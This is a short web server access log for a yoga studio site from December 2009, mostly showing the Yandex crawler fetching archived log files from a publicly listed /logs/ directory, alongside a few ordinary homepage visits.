77.88.29.247 - - [13/Dec/2009:20:22:52 -0800] "GET /logs/access_091201.log HTTP/1.1" 200 83387 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.peaceyoga.com"
72.129.32.59 - - [13/Dec/2009:20:32:02 -0800] "GET / HTTP/1.1" 200 916 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; WinTSI 22.10.2009; Hotbar 11.0.78.0)" "www.peaceyoga.com"
72.129.32.59 - - [13/Dec/2009:20:32:02 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; WinTSI 22.10.2009; Hotbar 11.0.78.0)" "www.peaceyoga.com"
77.88.29.247 - - [13/Dec/2009:21:14:52 -0800] "GET /logs/access_090301.log HTTP/1.0" 200 73030 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.peaceyoga.com"
77.88.29.247 - - [13/Dec/2009:22:08:08 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.peaceyoga.com"
77.88.29.247 - - [13/Dec/2009:23:00:56 -0800] "GET /logs/access_090701.log HTTP/1.0" 200 45555 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.peaceyoga.com"
77.88.29.247 - - [13/Dec/2009:23:50:17 -0800] "GET /logs/access_090901.log HTTP/1.1" 200 42289 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.peaceyoga.com"
77.88.29.247 - - [14/Dec/2009:00:39:42 -0800] "GET /logs/access_090201.log HTTP/1.1" 200 117565 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.peaceyoga.com"
77.88.29.247 - - [14/Dec/2009:01:29:05 -0800] "GET /logs/access_090531.log HTTP/1.1" 200 63535 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.peaceyoga.com"
77.88.29.247 - - [14/Dec/2009:02:18:54 -0800] "GET /_private/ HTTP/1.1" 403 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.peaceyoga.com"
77.88.29.247 - - [14/Dec/2009:03:09:24 -0800] "GET /logs/access_081031.log HTTP/1.1" 200 84619 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.peaceyoga.com"
77.88.29.247 - - [14/Dec/2009:03:58:55 -0800] "GET /logs/ HTTP/1.1" 200 3804 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.peaceyoga.com"
77.88.29.247 - - [14/Dec/2009:04:48:00 -0800] "GET /logs/access_090330.log HTTP/1.1" 200 3322 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.peaceyoga.com"
123.236.125.72 - - [14/Dec/2009:04:50:36 -0800] "GET / HTTP/1.1" 200 916 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; InfoPath.2; .NET CLR 1.1.4322)" "peaceyoga.com"
123.236.125.72 - - [14/Dec/2009:04:51:08 -0800] "GET / HTTP/1.1" 200 916 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; InfoPath.2; .NET CLR 1.1.4322)" "www.peaceyoga.com"
123.236.125.72 - - [14/Dec/2009:04:51:19 -0800] "GET / HTTP/1.1" 200 916 "http://www.peaceyoga.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; InfoPath.2; .NET CLR 1.1.4322)" "www.peaceyoga.com"
